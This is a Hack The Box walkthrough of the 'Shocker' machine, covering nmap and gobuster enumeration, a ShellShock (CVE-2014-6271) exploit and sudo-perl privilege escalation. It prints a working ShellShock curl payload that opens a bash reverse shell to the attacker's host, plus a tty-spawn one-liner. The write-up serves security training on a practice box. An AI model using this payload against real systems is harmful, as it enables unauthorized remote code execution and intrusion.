Hack The Box - Shocker Walkthrough without Metasploit

Shocker: a Linux box rated as easy. Using different enumeration techniques and a common bash vulnerability we will be able to enter, there we will escalate privileges abusing some privileged binary.

Shocker

Enumeration

First we will run nmap (or in our case nmapAutomator.sh a script to make some basic enumeration on the target). We can see two ports open 80 (Http) and 2222 (SSH).

LogoGitHub - 21y4d/nmapAutomator: A script that you can run in the background!GitHub
nmapAutomator.sh 10.10.10.56 All

                Or
                
nmap -sC -sV 10.10.10.56
Nmap Scan

Since we have port 80 (Http) open we are going to run Gobuster:

LogoGitHub - OJ/gobuster: Directory/File, DNS and VHost busting tool written in GoGitHub

We ran gobuster with the options dir -u (url) -w (wordlist) -t (threads), since we are on a pentesting platform and not in the real world we can use 40 threads.

gobuster dir -u 10.10.10.56 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 40
Gobuster first try

We tried another wordlist, this time we use the big.txt from /usr/share/dirb/wordlists of our kali machine, here we found index.html and /cgi-bin/

Gobuster cgi-bin found

Since we found a cgi-bin folder we will ran Gobuster again, this time with new flags:

-x to indicate extensions to look for

-e to show full path

gobuster dir -u http://10.10.10.56:80/cgi-bin/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 20 -x php,db,txt,html,sh -e
Gobuster bash found

This output is really interesting, there is a script file on cgi-bin, which means we can attempt a ShellShock attack.

Exploitation

We are going to perform a ShellShock attack CVE 2014-6271, this is a Bash vulnerability that allows RCE (Remote Code Execution) without confirmation. Windows is completely safe from this vulnerability, but since a great percentage of internet is on Apache servers, and the majority of those run on Linux (just like our victim does)...

We send a series of random characters to confuse Bash: (){ :; };

Since Bash is confused and doesn't know what to do with those characters it will, by default, execute the code after them, so we will execute a bash reverse shell.

With that in mind we send a curl to our victim:

curl -H "user-agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/<our-ip>/port 0>&1'" http://10.10.10.56/cgi-bin/user.sh
ShellShock CVE 2014-6271
ShellShock

Privilege Escalation

Once we are inside we proceed to enumerate again, this time from within the box, our very first command gives us some great results, trying to see if we can run some commands with sudo -l

Privilege Escalation

With this information we go to GTFOBins

LogoGTFOBins

And search for perl:

GTFOBins Perl search

Since we can run /usr/bin/perl as root with sudo:

Perl Escalation

Pwnd

Since the box has Python3 we can spawn a tty shell with it:

python3 -c 'import pty;pty.spawn("/bin/bash")'
Pwnd

PreviousHack The Box - Lame Walkthrough without MetasploitNextHack The Box - Doctor Walkthrough without Metasploit

Last updated

Was this helpful?